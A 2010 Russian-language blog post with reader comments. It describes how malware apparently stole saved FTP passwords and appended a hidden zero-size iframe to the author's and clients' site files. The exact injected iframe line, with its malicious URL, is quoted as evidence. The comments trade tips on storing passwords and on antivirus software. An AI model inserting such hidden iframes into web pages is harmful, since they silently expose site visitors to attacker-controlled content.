Вирус, вставляющий iframe
На днях случилось пренеприятнейшее событие. Какая-то сетевая зараза пробралась сквозь фаерволл и антивирус и, по всей видимости, украла пароли от всех FTP, сохранённых в клиенте. Причём в клиенте были пароли не только от моих сайтов, но и от клиентских.
С утра зайдя на блог я увидел какую-то ошибку интерпретатора PHP в файле wp-config.php. Сразу побежал смотреть что там и как. Оказалось, что в конце файла дописались следующие строки
<iframe width="0" height="0" frameborder="0" scrolling="no" src="http://click-clickc.com/index12"></iframe>
Начал вручную вычленять файлы по дате и чистить от этих строк. Потом оказалась что большая часть сайтов, которые были в FTP-клиенте с такой же проблемой. Через полчаса решил, что чистить руками сильно нерационально и написал небольшой скрипт, который делал это за меня.
Зараза прописывается в html, htm, php, cgi и т.д. Из всех сайтов нормально всё вычищалось и после этого работало, кроме сайтов на WordPress. Уж не знаю почему, но эта дрянь отрезала конец у некоторых файлов. Поковырял сайт, который в iframe — зареган у китайского регистратора. Решил не возиться.
В общем, всё обошлось. Клиенты, судя по всему, не успели заметить проблемы.
Мораль сказки такова — не храните пароли в FTP-клиентах, господа.
Октябрь 13th, 2010 - 21:24
Вот блин, а у меня сайтов 10 в FTPшнике сохранено с паролями. Нужно будет убрать пароли...
Октябрь 14th, 2010 - 18:54
а если просто в истории висит? то это норм?) или тоже лучше чистить историю фаилзилы
Октябрь 14th, 2010 - 22:19
Я думаю лучше всё чистить.
Октябрь 19th, 2010 - 18:49
но все же, можешь чистить и чистить, а один раз забыл и взломали да и еще сейчас не плохо и так взламывают доступы к фтп
Октябрь 26th, 2010 - 09:42
вот недавно чистил сайт, в конце каждой страницы добавлен был скрипт и просто взломали фтп
Октябрь 22nd, 2010 - 04:21
Лучше не поскупиться и заплатить денег за нормальный антивирус. Иначе не одно, так другое.
Октябрь 22nd, 2010 - 22:05
История. А у меня тоже все сайта повисли, вчера, но проблема видимо шла свыше — от хостера, а поначалу думал, что задефейсили именно меня, на всех сайтах были дефейсы турецкого закера, оказалось позже — что не только на моем фтп, но и всех фтп хостера.
Октябрь 27th, 2010 - 03:34
Интересно как обошли фаеврол и антивирусник) Это еще не так опасно как могло бы=)
Октябрь 27th, 2010 - 07:52
вот и обошли) у меня в офисе попался вирус, который в базах антивирусов еще не был и просто беда была, не удалить его, только нод32 говорил, что это ВОЗМОЖНО вирус, т.е. он сомневался еще)) а на след день наконец-то удалили
Октябрь 29th, 2010 - 19:22
А сам вирус в компьютере нашел?А то повторишь подвиг
Ноябрь 5th, 2010 - 21:08
это не обязательно вирус на компе, мб просто он зашел, сделал что хотел, ушел xD
Ноябрь 6th, 2010 - 23:06
Пароли лучше всего на бумаге записывать и возле компа хранить. Тот хакер может с вами по соседству живёт и все ваши сайты и клиенты облазил, но листочек из блокнота не сможет))
Ноябрь 10th, 2010 - 19:46
Я наоборот никогда пароли с клавиатуры не ввожу, только копирую и вставляю.
Ноябрь 10th, 2010 - 08:05
Не знаю что насчёт листочков , с паролями начал дружить и водиться , как только встретился с взломами , выниманием ключей . А что касается ФТП сайтов это тоже проблемно , лучше обновление какое посоветуйте ибо не хочу влетать в просак.
Ноябрь 13th, 2010 - 01:07
Матерая вирусня! А что за антивирус стоит?
Ноябрь 13th, 2010 - 01:30
KAV
Ноябрь 15th, 2010 - 04:07
Вот вам хорошо, если вы отлично разбираетесь в кодах и так дальше. Новичкам, таким как я будет достаточно сложно в этом деле.
Ноябрь 17th, 2010 - 00:11
Какой ужас, у меня пароли как раз хранятся в Filezille! Сегодня же удалю их отутда! Мне даже в голову раньше не приходило, что хранить пароли там опасно. Спасибо за статью!!!
Ноябрь 21st, 2010 - 20:49
Кстати я не мог вытащить пароль из FAR-manager. Это мой первый и основной FTP-клиент, потому что получилось с первого раза. А потом я забыл какой пароль вставлял, потому что их было много для бесплатного буржуйского хостинга.
Как то раз что-то открыл, но вместо пароля какие-то кракозябры.
Декабрь 7th, 2010 - 21:18
Сколько уже писано, что не стоит хранить пароли от ФТП в клиентах... Для этого или тикет специальный на комп можно наклеить или иметь флеху с подобными данными. Вставил — скопировал пароль — вынул.
А на счет обрезанных файлов вордпреса — снос под корень и заливка резервной копии, что лежит у вас на компе. Вы ведь делаете резервные копии??? Ну если нет — то теперь будете...
Декабрь 8th, 2010 - 00:23
Кэп?
Декабрь 9th, 2010 - 06:10
Как ни печально, полной гарантии против этой заразы нет. Можно потратить немного времени и с толком поискать в буржуйском интернете альтернативы нашим антивирусам, там вариантов навалом, даже бесплатных с обновлением.
Декабрь 11th, 2010 - 01:43
Ой как я в своё время на мучался с этим инфреймом...жуть...
Декабрь 12th, 2010 - 07:42
Давно пришёл к выводу, пароли в FTP-менеджерах хранить не стоит, впрочем, как и в браузерах... Хорошо, что обошлось всё!
Декабрь 15th, 2010 - 07:14
да все что связано с паролями — лучше хранить у себя в блокнотике, как в старые добрые времена да, и большой замок на этот блокнотик... ыыы
Декабрь 22nd, 2010 - 19:51
Вообще лучше вводить все вручную, никогда не любил все эти автозапоминания и автозаполнения форм. Ж)
Декабрь 24th, 2010 - 19:28
Чего это не хранить пароли в FTP-клиентах?.. Очень даже можно так делать... Я уже много лет храню их там и ни когда не страдал от этого вируса... Главное нужно следить за своей безопасностью... Точнее безопасностью своего компьютера... Использовать лицензионный антивирус... Желательно Касперского... Ну и естественно качественно настроенный фаервол... И будет счастье... Пробить такую защиту возможно, но не массовыми средствами, а делать что-то индивидуальное не всегда целесообразно...